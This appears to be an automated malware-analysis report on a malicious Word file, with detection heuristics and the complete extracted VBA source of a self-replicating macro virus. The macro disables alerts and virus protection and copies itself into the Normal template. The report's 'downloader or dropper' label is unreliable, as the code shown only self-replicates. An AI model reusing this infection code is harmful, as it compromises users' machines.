MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro writes its own code to disk as 'C:\G00ber.sys' and then attempts to replace the original document with a copy of the malicious code. This behavior is indicative of a downloader or dropper.
Heuristics 3
-
ClamAV: Doc.Trojan.Goober-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Goober-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7076 bytes |
SHA-256: afc4926bb71c39dc0e71764ff3ac86a671dd37a3ec4e41631a4947a12ee8ab0b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetCursorPos Lib "USER32" _
(ByVal x As Long, ByVal y As Long) As Long
Private Declare Function GetCursorPos Lib "USER32" _
(lpPoint As Punkt) As Long
Private Type Punkt
xAchse As Long
yAchse As Long
End Type
Private Declare Sub Sleep Lib "kernel32" _
(ByVal dwMilliseconds As Long)
Private Sub document_Open(): On Error Resume Next:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)
Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
With myRange.Find
.ClearFormatting
.Text = "shithe!"
With .Replacement
.ClearFormatting
.Text = "the"
End With
.Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
MatchWholeWord:=True
End With
End Sub
Private Sub document_New(): On Error Resume Next:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)
Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.